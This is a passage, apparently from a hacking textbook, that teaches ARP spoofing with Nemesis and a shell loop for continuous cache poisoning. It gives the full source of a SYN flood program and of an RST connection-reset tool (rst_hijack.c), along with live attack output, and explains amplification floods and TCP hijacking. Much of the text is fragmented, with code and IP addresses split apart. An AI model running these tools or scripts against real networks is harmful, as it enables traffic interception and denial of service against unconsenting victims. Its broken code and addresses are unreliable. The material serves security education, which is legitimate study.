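uint16_t ether_type_host_order(const unsigned char *frame) {
    uint16_t raw;
    memcpy(&raw, frame + 12, sizeof raw); /* copy out to avoid unaligned access */
    return ntohs(raw);
}
```

For an IP packet the result is 0x0800. Printing the raw field without conversion on a little-endian host would show 8 instead, which is consistent with a "Type: 8" line in decoder output that skips this step.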

reader@hacking:~/booksrc $ gcc -o decode_sniff decode_sniff
...
/decode_sniff
Sniffing on device eth0
==== Got a 75 byte packet ====
[[ Layer 2 :: Ethernet Header ]]
[ Source: 00:01:29:15:65:b6   Dest: 00:01:6c:eb:1d:50   Type: 8 ]
(( Layer 3 ::: IP Header ))
( Source: 192
...
42
...
168
...
249 )
( Type: 6   ID: 7755   Length: 61 )
{{ Layer 4 :::: TCP Header }}
{ Src Port: 35602   Dest Port: 7890 }
{ Seq #: 2887045274   Ack #: 3843058889 }
{ Header Size: 32   Flags: PUSH ACK }
9 bytes of packet data
74 65 73 74 69 6e 67 0d 0a
| testing
...
168
...
249
Dest: 192
...
42
...
168
...
1 Dest: 192
...
42
...

reader@hacking:~/booksrc $

With the headers decoded and separated into layers, the TCP/IP connection is much easier to understand
...
Also, notice how the sequence number in the two packets
from 192
...
42
...

This is used by the TCP protocol to make sure all of the data arrives in order,
since packets could be delayed for various reasons
...
Protocols such as
FTP, POP3, and telnet transmit data without encryption
...
From a security perspective, this isn’t too good,
so more intelligent switches provide switched network environments
...
This requires
more intelligent hardware that can create and maintain a table associating
MAC addresses with certain ports, depending on which device is connected
to each port, as illustrated here
...
But even in a switched environment, there are
clever ways to sniff other devices’ packets; they just tend to be a bit more
complex
...

One important aspect of network communications that can be manipulated for interesting effects is the source address
...
The act of forging a source address in a packet
is known as spoofing
...

[Figure: a switch with three ports, each connected to one device, and the switch's table of port-to-MAC associations]
Port 1  00:00:00:AA:AA:AA
Port 2  00:00:00:BB:BB:BB
Port 3  00:00:00:CC:CC:CC

Spoofing is the first step in sniffing packets on a switched network
...
First, when an ARP reply comes
in with an IP address that already exists in the ARP cache, the receiving system
will overwrite the prior MAC address information with the new information
found in the reply (unless that entry in the ARP cache was explicitly marked
as permanent)
...
This means systems will accept an ARP reply even
if they didn’t send out an ARP request
...
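The overwrite behavior is easier to see in a toy model. The sketch below is an in-memory simulation only; demo_arp_entry and demo_arp_on_reply() are invented for illustration and do not correspond to any kernel's real data structures. It models just the case described here, an update to an existing entry, and shows why an entry marked permanent is a simple defense.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Toy ARP cache entry; the field names are invented for this sketch. */
struct demo_arp_entry {
    unsigned char ip[4];
    unsigned char mac[6];
    bool in_use;
    bool permanent;   /* statically configured entries are never replaced */
};

/* Applies an ARP reply to the cache. No record of outstanding requests is
 * consulted, mirroring the stateless behavior described in the text.
 * Returns true if an existing entry for `ip` was overwritten with `mac`. */
bool demo_arp_on_reply(struct demo_arp_entry *cache, size_t n,
                       const unsigned char *ip, const unsigned char *mac) {
    for (size_t i = 0; i < n; i++) {
        if (!cache[i].in_use || memcmp(cache[i].ip, ip, 4) != 0)
            continue;
        if (cache[i].permanent)
            return false;             /* static entry: the reply is ignored */
        memcpy(cache[i].mac, mac, 6); /* dynamic entry: overwritten */
        return true;
    }
    return false; /* unknown IP: this sketch only models existing entries */
}
```

Marking the gateway's entry as permanent on a host is the practical counterpart of the permanent flag in this model.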
The attacker sends spoofed ARP replies to certain devices that cause
the ARP cache entries to be overwritten with the attacker’s data
...
In order to sniff network traffic between
two points, A and B, the attacker needs to poison the ARP cache of A to
cause A to believe that B’s IP address is at the attacker’s MAC address, and
also poison the ARP cache of B to cause B to believe that A’s IP address is also
at the attacker’s MAC address
...
After that, all
of the traffic between A and B still gets delivered, but it all flows through the
attacker’s machine, as shown here
...
168
...
100
MAC: 00:00:00:AA:AA:AA

System B
IP: 192
...
0
...
168
...
200 at 00:00:00:FA:CA:DE

Internal ARP cache
192
...
0
...
168
...
137
MAC: 00:00:00:FA:CA:DE
Internal ARP cache
192
...
0
...
168
...
22 at 00:00:00:BB:BB:BB

Traffic to A
Traffic to B

Since A and B are wrapping their own Ethernet headers on their packets
based on their respective ARP caches, A’s IP traffic meant for B is actually sent
to the attacker’s MAC address, and vice versa
...
Then the attacker rewraps the IP packets with the proper Ethernet
headers and sends them back to the switch, where they are finally routed to
their proper destination
...

Due to timeout values, the victim machines will periodically send out real
ARP requests and receive real ARP replies in response
...
A simple way to accomplish this is to send spoofed ARP replies to
both A and B at a constant interval—for example, every 10 seconds
...
ARP redirection is particularly interesting when one of the victim
machines is the default gateway, since the traffic between the default gateway
and another system is that system’s Internet traffic
...
168
...
118 is communicating with the gateway at 192
...
0
...
This means that this
traffic cannot normally be sniffed, even in promiscuous mode
...

To redirect the traffic, first the MAC addresses of 192
...
0
...
168
...
1 need to be determined
...
If you run a sniffer, you can
see the ARP communications, but the OS will cache the resulting IP/MAC
address associations
...
168
...
1
PING 192
...
0
...
168
...
1): 56 octets data
64 octets from 192
...
0
...
4 ms
--- 192
...
0
...
4/0
...
4 ms
reader@hacking:~/booksrc $ ping -c 1 -w 1 192
...
0
...
168
...
118 (192
...
0
...
168
...
118: icmp_seq=0 ttl=128 time=0
...
168
...
118 ping statistics --1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0
...
4/0
...
168
...
1) at 00:50:18:00:0F:01 [ether] on eth0
? (192
...
0
...
168
...
193 Bcast:192
...
0
...
255
...
0
UP BROADCAST NOTRAILERS RUNNING MTU:1500 Metric:1
RX packets:4153 errors:0 dropped:0 overruns:0 frame:0
TX packets:3875 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:601686 (587
...
8 Kb)
Interrupt:9 Base address:0xc000
reader@hacking:~/booksrc $

After pinging, the MAC addresses for both 192
...
0
...
168
...
1
are in the attacker’s ARP cache
...
Assuming IP
forwarding capabilities are compiled into the kernel, all we need to do is
send some spoofed ARP replies at regular intervals
...
168
...
118 needs to
be told that 192
...
0
...
168
...
1 needs to be
told that 192
...
0
...
These spoofed ARP packets
can be injected using a command-line packet injection tool called Nemesis
...
4, all functionality has been rolled up into a single
utility by the new maintainer and developer, Jeff Nathan
...
4/, and it has already
been built and installed
...
4 (Build 26)
NEMESIS Usage:
nemesis [mode] [options]
NEMESIS modes:
arp
dns
ethernet
icmp
igmp
ip
ospf (currently non-functional)
rip
tcp
udp
NEMESIS options:
To display options, specify a mode with the option "help"
...
4 (Build 26)
ARP/RARP Usage:
arp [-v (verbose)] [options]
ARP/RARP Options:
-S
-D
-h
-m
-s
-r ({ARP,RARP} REPLY enable)
-R (RARP enable)
-P
Data
-d
-H
-M

Link Options:

You must define a Source and Destination IP address
...
168
...
1 -D
192
...
0
...
4 (Build 26)
[MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
[Ethernet type] ARP (0x0806)
[Protocol addr:IP] 192
...
0
...
168
...
118
[Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
[ARP opcode] Reply
[ARP hardware fmt] Ethernet (1)
[ARP proto format] IP (0x0800)
[ARP protocol len] 6
[ARP hardware len] 4

Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB
ARP Packet Injected
reader@hacking:~/booksrc $ sudo nemesis arp -v -r -d eth0 -S 192
...
0
...
168
...
1 -h 00:00:AD:D1:C7:ED -m 00:50:18:00:0F:01 -H 00:00:AD:D1:C7:ED -M
00:50:18:00:0F:01
ARP/RARP Packet Injection -=- The NEMESIS Project Version 1
...
168
...
118 > 192
...
0
...

ARP Packet Injected
reader@hacking:~/booksrc $

These two commands spoof ARP replies from 192
...
0
...
168
...
118
and vice versa, both claiming that their MAC address is at the attacker’s MAC
address of 00:00:AD:D1:C7:ED
...
The standard BASH shell allows commands to be
scripted, using familiar control flow statements
...

reader@hacking:~/booksrc $ while true
> do

> sudo nemesis arp -v -r -d eth0 -S 192
...
0
...
168
...
118 -h
00:00:AD:D1:C7:ED -m 00:C0:F0:79:3D:30 -H 00:00:AD:D1:C7:ED -M
00:C0:F0:79:3D:30
> sudo nemesis arp -v -r -d eth0 -S 192
...
0
...
168
...
1 -h
00:00:AD:D1:C7:ED -m 00:50:18:00:0F:01 -H 00:00:AD:D1:C7:ED -M
00:50:18:00:0F:01
> echo "Redirecting
...
4 (Build 26)
[MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
[Ethernet type] ARP (0x0806)
[Protocol addr:IP] 192
...
0
...
168
...
118
[Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
[ARP opcode] Reply
[ARP hardware fmt] Ethernet (1)
[ARP proto format] IP (0x0800)
[ARP protocol len] 6
[ARP hardware len] 4
Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB
...
4 (Build 26)
[MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
[Ethernet type] ARP (0x0806)
[Protocol addr:IP] 192
...
0
...
168
...
1
[Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
[ARP opcode] Reply
[ARP hardware fmt] Ethernet (1)
[ARP proto format] IP (0x0800)
[ARP protocol len] 6
[ARP hardware len] 4
Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB
...

You can see how something as simple as Nemesis and the standard BASH
shell can be used to quickly hack together a network exploit
...
Similar to
libpcap, this library uses raw sockets and evens out the inconsistencies between
platforms with a standardized interface
...

The libnet library provides a simple and uniform API to craft and inject
network packets
...
A high-level glance at the source code for Nemesis shows how easy it
is to craft ARP packets using libnet
...
c contains
several functions for crafting and injecting ARP packets, using statically defined
data structures for the packet header information
...
c to build and inject an ARP packet
...
c
static ETHERhdr etherhdr;
static ARPhdr arphdr;

...
h (shown
below) as aliases for existing libnet data structures
...

From nemesis
...
You can
probably guess that these functions initialize data, process command-line arguments, validate data, and do some sort of verbose reporting
...

The arp_initdata() function, shown below, sets various elements of the
header structures to the appropriate values for an ARP packet
...
c
static void arp_initdata(void)
{
/* defaults */
etherhdr
...
ether_shost, 0, 6);
/* Ethernet source address */
memset(etherhdr
...
ar_op = ARPOP_REQUEST;
/* ARP opcode: request */
arphdr
...
ar_pro = ETHERTYPE_IP;
/* protocol format: IP */
arphdr
...
ar_pln = 4;
/* 4 byte protocol addresses */
memset(arphdr
...
ar_spa, 0, 4);
/* ARP sender protocol (IP) addr */
memset(arphdr
...
ar_tpa, 0, 4);
/* ARP target protocol (IP) addr */
pd
...
file_s = 0;
return;
}

Finally, the nemesis_arp() function calls the function buildarp() with
pointers to the header data structures
...

This function is found in yet another source file, nemesis-proto_arp
...

From nemesis-proto_arp
...
\n", arp_packetlen);
printf("DEBUG: ARP payload size %u
...
\n");
return -1;
}
libnet_build_ethernet(eth->ether_dhost, eth->ether_shost, eth->ether_type,
NULL, 0, pkt);
libnet_build_arp(arp->ar_hrd, arp->ar_pro, arp->ar_hln, arp->ar_pln,
arp->ar_op, arp->ar_sha, arp->ar_spa, arp->ar_tha, arp->ar_tpa,
pd->file_mem, pd->file_s, pkt + LIBNET_ETH_H);
n = libnet_write_link_layer(l2, device, pkt, LIBNET_ETH_H +
LIBNET_ARP_H + pd->file_s);
if (verbose == 2)
nemesis_hexdump(pkt, arp_packetlen, HEX_ASCII_DECODE);
if (verbose == 3)
nemesis_hexdump(pkt, arp_packetlen, HEX_RAW_DECODE);
if (n != arp_packetlen)
{
fprintf(stderr, "ERROR: Incomplete packet injection
...
\n", n);
}
else
{
if (verbose)
{
if (memcmp(eth->ether_dhost, (void *)&one, 6))
{
printf("Wrote %d byte unicast ARP request packet through "
"linktype %s
...
\n", n,
(eth->ether_type == ETHERTYPE_ARP ? "ARP" : "RARP"),
nemesis_lookup_linktype(l2->linktype));
}
}
}
libnet_destroy_packet(&pkt);
if (l2 != NULL)
libnet_close_link_interface(l2);
return (n);
}

At a high level, this function should be readable to you
...
Then,
it builds the Ethernet layer using elements from the Ethernet header data
structure and then does the same for the ARP layer
...
The documentation for these functions from the libnet
man page is shown below for clarity
...
This is
required to write link layer frames
...
Returned is a
filled in libnet_link_int struct or NULL on error
...
If the size parameter is
omitted (or negative) the library will pick a reasonable value for the user
(currently LIBNET_MAX_PACKET)
...
If there is an error, the
function returns -1
...

libnet_build_ethernet() constructs an ethernet packet
...
The ethernet packet type should be one of the following:
Value               Type
ETHERTYPE_PUP       PUP protocol
ETHERTYPE_IP        IP protocol
ETHERTYPE_ARP       ARP protocol
ETHERTYPE_REVARP    Reverse ARP protocol
ETHERTYPE_VLAN      IEEE VLAN tagging
ETHERTYPE_LOOPBACK  Used to test interfaces

libnet_build_arp() constructs an ARP (Address Resolution Protocol) packet
...
Note that this function only builds ethernet/IP ARP packets, and consequently
the first value should be ARPHRD_ETHER
...

libnet_destroy_packet() frees the memory associated with the packet
...

Returned is 1 upon success or -1 on error
...
For example,
Dug Song provides a program called arpspoof, included with dsniff, that performs the ARP redirection attack
...
This is
an extremely effective way of sniffing traffic on a switch
...
g
...

OPTIONS
-i interface
Specify the interface to use
...

host

specified, all

Specify the host you wish to intercept packets for (usually the
local gateway)
...
org>

The magic of this program comes from its arp_send() function, which also
uses libnet to spoof packets
...
The use of structures and an error buffer should also
be familiar
...
c
static struct libnet_link_int *llif;
static struct ether_addr spoof_mac, target_mac;
static in_addr_t spoof_ip, target_ip;

...
These functions have descriptive names and are explained
in detail on the libnet man page
...
to a link layer interface struct, a
and an empty buffer to be used in case of
The function returns the MAC address of the specified interface upon
success or 0 upon error (and errbuf will contain a reason)
...
Upon success the function returns the IP address of the specified
interface in host-byte order or 0 upon error (and errbuf will contain a
reason)
...
If use_name is 1,
libnet_host_lookup() will attempt to resolve this IP address and return a
hostname, otherwise (or if the lookup fails), the function returns a dotted-decimal ASCII string
...
Programming libraries like libnet and libpcap have
plenty of documentation that explains all the details you may not be able to
divine from the source alone
...
After
all, there are many other libraries and a lot of existing source code that
uses them
...

Instead of trying to steal information, a DoS attack simply prevents access to
a service or resource
...

Denial of Service attacks that crash services are actually more similar to
program exploits than network-based exploits
...
A buffer overflow exploit
gone wrong will usually just crash the target program instead of directing the
execution flow to the injected shellcode
...
Crashing
DoS attacks like this are closely tied to a certain program and a certain version
...
Many of
these vulnerabilities have long since been patched on modern operating
systems, but it’s still useful to think about how these techniques might be
applied to different situations
...
Since TCP maintains
“reliable” connections, each connection needs to be tracked somewhere
...
A SYN flood uses spoofing to take
advantage of this limitation
...
Since a SYN packet is used to initiate a
TCP connection, the victim’s machine will send a SYN/ACK packet to the
spoofed address in response and wait for the expected ACK response
...
Since the spoofed source addresses don’t actually exist, the
ACK responses needed to remove these entries from the queue and complete
the connections never come
...
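The resource exhaustion can be modeled without any networking at all. The sketch below is a toy simulation with invented names (demo_backlog, demo_on_syn(), demo_on_ack()) and a made-up queue size of four; real TCP stacks also expire half-open entries after a timeout, which is left out here. It only illustrates that slots are released by the final ACK, so entries whose ACK never arrives keep legitimate SYNs out.

```c
#include <stdbool.h>
#include <stddef.h>

#define DEMO_BACKLOG 4  /* made-up queue size, for illustration only */

struct demo_backlog {
    unsigned pending[DEMO_BACKLOG]; /* IDs of half-open connections */
    size_t used;                    /* number of occupied slots */
};

/* A SYN arrives: reserve a slot until the handshake completes.
 * Returns false when the queue is full and the SYN has to be dropped. */
bool demo_on_syn(struct demo_backlog *q, unsigned conn_id) {
    if (q->used == DEMO_BACKLOG)
        return false;
    q->pending[q->used++] = conn_id;
    return true;
}

/* The final ACK arrives: the matching half-open entry leaves the queue.
 * Returns false if no such entry was waiting. */
bool demo_on_ack(struct demo_backlog *q, unsigned conn_id) {
    for (size_t i = 0; i < q->used; i++) {
        if (q->pending[i] == conn_id) {
            q->pending[i] = q->pending[--q->used]; /* fill the gap with the last entry */
            return true;
        }
    }
    return false;
}
```

In this model, four SYNs that are never acknowledged are enough to make every later demo_on_syn() call fail, which is also why defenses focus on not holding state until the handshake completes.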

As long as the attacker continues to flood the victim’s system with spoofed
SYN packets, the victim’s backlog queue will remain full, making it nearly
impossible for real SYN packets to get to the system and initiate valid TCP/IP
connections
...
The example program below
uses libnet functions pulled from the source code and socket functions previously explained
...
The function
libnet_seed_prand() is used to seed the randomizer
...

synflood
...
h>
#define FLOOD_DELAY 5000 // Delay between packet injects, in microseconds (5000 us = 5 ms)
...
x
...
x notation */
char *print_ip(u_long *ip_addr_ptr) {
return inet_ntoa( *((struct in_addr *)ip_addr_ptr) );
}

int main(int argc, char *argv[]) {
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("Usage:\n%s\t \n", argv[0]);
exit(1);
}

dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // The host
dest_port = (u_short) atoi(argv[2]); // The port

network = libnet_open_raw_sock(IPPROTO_RAW); // Open network interface
...
-- this program must run
as root
...

if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory
...

printf("SYN Flooding port %d of %s
...

IP tos
IP ID (randomized)
Frag stuff
TTL (randomized)
Transport protocol
Source IP (randomized)
Destination IP
Payload (none)
Payload length
Packet header memory

libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // Source TCP port (random)
   dest_port,                      // Destination TCP port
   libnet_get_prand(LIBNET_PRu32), // Sequence number (randomized)
   libnet_get_prand(LIBNET_PRu32), // Acknowledgement number (randomized)
   TH_SYN,                         // Control flags (SYN flag set only)
   libnet_get_prand(LIBNET_PRu16), // Window size (randomized)
   0,                              // Urgent pointer
   NULL,                           // Payload (none)
   0,                              // Payload length
   packet + LIBNET_IP_H);          // Packet header memory
if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");
byte_count = libnet_write_ip(network, packet, packet_size); // Inject packet
...
(%d of %d
bytes)", byte_count, packet_size);
usleep(FLOOD_DELAY); // Wait for FLOOD_DELAY microseconds
...

if (libnet_close_raw_sock(network) == -1) // Close the network interface
...
");
return 0;
}

This program uses a print_ip() function to handle converting the
u_long type, used by libnet to store IP addresses, to the struct type expected
by inet_ntoa()
...

The current release of libnet is version 1
...
0
...
0 version of
libnet, so this version is included in the LiveCD and this is also what we will
use in our synflood program
...
However, this isn’t quite enough information for the compiler, as the output below shows
...
c -lnet
In file included from synflood
...
h:87:2: #error "byte order has not been specified, you'll"
synflood
...
Included with libnet, a program called libnet-config will output
these flags
...

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o synflood
synflood
...
/synflood
Usage:

...
/synflood 192
...
42
...
-- this program must run as root
...
/synflood 192
...
42
...
168
...
88
...
168
...
88 is a Windows XP machine
running an openssh server on port 22 via cygwin
...
While the program is running, legitimate connections cannot be made
to this port
...
168
...
88"
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
17:08:16
...
213
...
59
...
168
...
88
...
346907 IP 158
...
184
...
40565 > 192
...
42
...
22: S
139725579:139725579(0) win 64357
17:08:16
...
245
...
50
...
168
...
88
...
370492 IP 91
...
238
...
4814 > 192
...
42
...
22: S
685911671:685911671(0) win 62957
17:08:16
...
132
...
97
...
168
...
88
...
394909 IP 120
...
199
...
19452 > 192
...
42
...
22: S
1420507902:1420507902(0) win 53397
17:08:16
...
9
...
120
...
168
...
88
...
418494 IP 137
...
201
...
54665 > 192
...
42
...
22: S
1185734766:1185734766(0) win 57243
17:08:16
...
5
...
61
...
168
...
88
...
442911 IP 44
...
67
...
60484 > 192
...
42
...
22: S
1042470133:1042470133(0) win 7087
17:08:16
...
66
...
126
...
168
...
88
...
466493 IP 131
...
172
...
15390 > 192
...
42
...
22: S
2127701542:2127701542(0) win 23682
17:08:16
...
246
...
88
...
168
...
88
...
490908 IP 140
...
48
...
9179 > 192
...
42
...
22: S
1429854465:1429854465(0) win 2092
17:08:16
...
172
...
123
...
168
...
88
...
168
...
88
OpenSSH_4
...
9
...
168
...
88 [192
...
42
...

debug1: connect to address 192
...
42
...
168
...
88 port 22: Connection refused
reader@hacking:~/booksrc $

Some operating systems (for example, Linux) use a technique called
syncookies to try to prevent SYN flood attacks
...

The TCP connections don’t actually become active until the final ACK packet
for the TCP handshake is checked
...
This helps prevent
spoofed connection attempts, since the ACK packet requires information to
be sent to the source address of the initial SYN packet
...
The data portion
of ICMP packets is commonly overlooked, since the important information is
in the header
...
An ICMP echo message of this gargantuan size became affectionately known as “The Ping of Death
...
It should be easy for you to write a program using
libnet that can perform this attack; however, it won’t be that useful in the
real world
...

However, history tends to repeat itself
...
The Bluetooth protocol, commonly used with
phones, has a similar ping packet on the L2CAP layer, which is also used to
measure the communication time on established links
...
Adam
Laurie, Marcel Holtmann, and Martin Herfurt have dubbed this attack
Bluesmack and have released source code by the same name that performs
this attack
...
Teardrop exploited another weakness in several vendors’ implementations of IP fragmentation reassembly
...
The teardrop attack sent packet fragments with overlapping
offsets, which caused implementations that didn’t check for this irregular
condition to inevitably crash
...
Although not limited to a Denial
of Service, a recent remote exploit in the OpenBSD kernel (which prides
itself on security) had to do with fragmented IPv6 packets
...
Often, the same mistakes made in the
past are repeated by early implementations of new products
...
Similar attacks can tie up other
resources, such as CPU cycles and system processes, but a flooding attack
specifically tries to tie up a network resource
...
The goal is to use up
the victim’s bandwidth so that legitimate traffic can’t get through
...

There’s nothing really clever about this attack—it’s just a battle of bandwidth
...

0x455 Amplification Attacks
There are actually some clever ways to perform a ping flood without using
massive amounts of bandwidth
...

First, a target amplification system must be found
...
Then the attacker sends large ICMP echo request
packets to the broadcast address of the amplification network, with a spoofed
source address of the victim’s system
...
e
...

This amplification of traffic allows the attacker to send a relatively small
stream of ICMP echo request packets out, while the victim gets swamped with
up to a couple hundred times as many ICMP echo reply packets
...
These techniques
are known as smurf and fraggle attacks, respectively
...
Since bandwidth consumption is the goal of a flooding DoS attack,
the more bandwidth the attacker is able to work with, the more damage they
can do
...
Systems installed with such software are
commonly referred to as bots and make up what is known as a botnet
...
The
attacker uses some sort of a controlling program, and all of the bots simultaneously attack the victim with some form of flooding DoS attack
...

0x460 TCP/IP Hijacking
TCP/IP hijacking is a clever technique that uses spoofed packets to take over a
connection between a victim and a host machine
...
A one-time password can be used to authenticate once and only once,
which means that sniffing the authentication is useless for the attacker
...
By sniffing the local network segment, all of the details
of open TCP connections can be pulled from the headers
...
This sequence
number is incremented with each packet sent to ensure that packets are
received in the correct order
...
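The relationship between one side's sequence number and the other side's acknowledgment number is simple arithmetic. In the sketch below, expected_ack() is a hypothetical helper; it assumes a plain data segment and ignores the SYN and FIN flags, each of which also consumes one sequence number.

```c
#include <stdint.h>

/* Acknowledgment number a receiver would send after getting `len` bytes
 * starting at sequence number `seq`. uint32_t arithmetic wraps modulo 2^32,
 * which matches the 32-bit sequence number space. */
uint32_t expected_ack(uint32_t seq, uint32_t len) {
    return seq + len;
}
```

With the numbers used in this section's diagram, a 24-byte segment with sequence number 1429775000 is acknowledged with 1429775024.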
Then the attacker sends a
spoofed packet from the victim’s IP address to the host machine, using the
sniffed sequence number to provide the proper acknowledgment number,
as shown here
...
168
...
100

src : 192
...
0
...
168
...
200
seq #: 1429775000
ack #: 1250510000
len : 24

src : 192
...
0
...
168
...
100
seq #: 1250510000
ack #: 1429775024
len : 167

Attacker
system

System B
192
...
0
...
168
...
100
dst : 192
...
0
...

0x461 RST Hijacking
A very simple form of TCP/IP hijacking involves injecting an authentic-looking
reset (RST) packet
...

Imagine a program to perform this attack on a target IP
...
Such a
program doesn’t need to look at every packet but only at established TCP
connections to the target IP
...
This filter, known as a Berkeley
Packet Filter (BPF), is very similar to a program
...
168
...
88 is "dst host 192
...
42
...
Like
a program, this rule consists of keywords and must be compiled before it’s
actually sent to the kernel
...

reader@hacking:~/booksrc $ sudo tcpdump -d "dst host 192
...
42
...
168
...
88"
10
40 0 0 12
21 0 2 2048
32 0 0 30
21 4 5 3232246360
21 1 0 2054
21 0 3 32821
32 0 0 38
21 0 1 3232246360
6 0 0 96
6 0 0 0
reader@hacking:~/booksrc $

After the filter rule is compiled, it can be passed to the kernel for filtering
...
All
established connections will have the ACK flag set, so this is what we should
look for
...
The flags are found in the following order, from left to right: URG, ACK, PSH,
RST, SYN, and FIN
...
If both SYN and
ACK are turned on, the 13th octet would be 00010010 in binary, which is 18
in decimal
...

ANDing 00010010 with 00010000 will produce 00010000, since the ACK bit is the
only bit where both bits are 1
...
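The same test is a one-line bitwise AND in C. The sketch below reuses the TH_SYN and TH_ACK values from the tcphdr listing earlier in this section; has_ack() is a hypothetical helper. Note that C needs the parentheses around the AND, because != binds more tightly than & in C.

```c
#include <stdbool.h>
#include <stdint.h>

#define TH_SYN 0x02  /* 00000010 */
#define TH_ACK 0x10  /* 00010000 */

/* True when the ACK bit is set in the TCP flags octet, whatever else is set. */
bool has_ack(uint8_t flags) {
    return (flags & TH_ACK) != 0;
}
```

A SYN/ACK flags octet is TH_SYN | TH_ACK, or 18; ANDing it with TH_ACK leaves 16, so has_ack() reports true, while a bare SYN (2) ANDs to 0.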

This filter rule can be rewritten using named values and inverted logic as
tcp[tcpflags] & tcp-ack != 0
...
This rule can be combined with the previous destination IP rule using
and logic; the full rule is shown below
...
168
...
88"
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
10:19:47
...
168
...
72
...
168
...
88
...
ack 2777534975 win 92

10:19:47
...
168
...
72
...
168
...
88
...
ack 22 win 92 85838621 29399>
10:19:47
...
168
...
72
...
168
...
88
...
771536 IP 192
...
42
...
40238 > 192
...
42
...
22: P 20:732(712) ack 766 win 115

10:19:47
...
168
...
72
...
168
...
88
...
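Combining the two rules in a program amounts to building one filter string. The sketch below is a minimal, hedged example: build_ack_filter() is an invented helper, the address in the usage note is a documentation placeholder, and snprintf() is used so that an overlong address cannot overflow the buffer. Compiling and installing the resulting string is left to libpcap and is not shown.

```c
#include <stddef.h>
#include <stdio.h>

/* Writes "tcp[tcpflags] & tcp-ack != 0 and dst host <ip>" into `out`.
 * Returns 0 on success, or -1 if the buffer is too small (or on a
 * formatting error), in which case `out` should not be used. */
int build_ack_filter(char *out, size_t out_size, const char *dotted_ip) {
    int n = snprintf(out, out_size,
                     "tcp[tcpflags] & tcp-ack != 0 and dst host %s", dotted_ip);
    if (n < 0 || (size_t)n >= out_size)
        return -1;
    return 0;
}
```

Calling build_ack_filter(buf, sizeof buf, "192.0.2.88") with a 100-byte buffer leaves "tcp[tcpflags] & tcp-ack != 0 and dst host 192.0.2.88" in buf.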
When the program gets a packet, the header information is
used to spoof a RST packet
...

rst_hijack
...
h>
#include ...
h"
void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *);
struct data_pass {
int libnet_handle;
u_char *packet;
};
int main(int argc, char *argv[]) {
struct pcap_pkthdr cap_header;
const u_char *packet, *pkt_data;
pcap_t *pcap_handle;

char errbuf[PCAP_ERRBUF_SIZE]; // Same size as LIBNET_ERRBUF_SIZE
char *device;
u_long target_ip;
int network;
struct data_pass critical_libnet_data;
if(argc < 2) { // argv[1] is required, so at least two arguments are needed
printf("Usage: %s <target IP>\n", argv[0]);
exit(0);
}
target_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE);
if (target_ip == -1)
fatal("Invalid target address");
device = pcap_lookupdev(errbuf);
if(device == NULL)
fatal(errbuf);
pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);
if(pcap_handle == NULL)
fatal(errbuf);
critical_libnet_data
...
libnet_handle == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface
...
\n");
libnet_init_packet(LIBNET_IP_H + LIBNET_TCP_H, &(critical_libnet_data
...
packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory
...
In the beginning,
a data_pass structure is defined, which is used to pass data through the libpcap
callback
...
The file descriptor for the raw socket and a pointer to the packet
memory will be needed in the callback function, so this critical libnet data is
stored in its own structure
...
By passing a pointer
to the critical_libnet_data structure, the callback function will have access to
everything in this structure
...

/* Sets a packet filter to look for established TCP connections to target_ip */
int set_packet_filter(pcap_t *pcap_hdl, struct in_addr *target_ip) {
   struct bpf_program filter;
   char filter_string[100];

   // snprintf() bounds the write to the size of filter_string.
   snprintf(filter_string, sizeof(filter_string),
            "tcp[tcpflags] & tcp-ack != 0 and dst host %s", inet_ntoa(*target_ip));
   printf("DEBUG: filter string is \'%s\'\n", filter_string);
   if(pcap_compile(pcap_hdl, &filter, filter_string, 0, 0) == -1)
      fatal("pcap_compile failed");
   if(pcap_setfilter(pcap_hdl, &filter) == -1)
      fatal("pcap_setfilter failed");
   return 0; // The function is declared int, so report success explicitly
}

The next function compiles and sets the BPF to only accept packets from
established connections to the target IP
...

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char *packet) {
u_char *pkt_data;
struct libnet_ip_hdr *IPhdr;
struct libnet_tcp_hdr *TCPhdr;
struct data_pass *passed;
int bcount;
passed = (struct data_pass *) user_args; // Pass data using a pointer to a struct
...
");
usleep(5000); // pause slightly
}

The callback function spoofs the RST packets
...
We could use our own structures from hacking-network
...
The spoofed RST packet uses the sniffed source address as
the destination, and vice versa
...

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o rst_hijack rst_hijack
...
/rst_hijack 192
...
42
...
168
...
88'
Resetting all TCP connections to 192
...
42
...
168
...
72:47783 <---> 192
...
42
...
This attack becomes
more interesting when the spoof packet contains data
...
Since the victim’s machine doesn’t know about the spoofed
packet, the host machine’s response has an incorrect sequence number, so
the victim ignores that response packet
...
Therefore, any packet the victim tries to send to the host machine
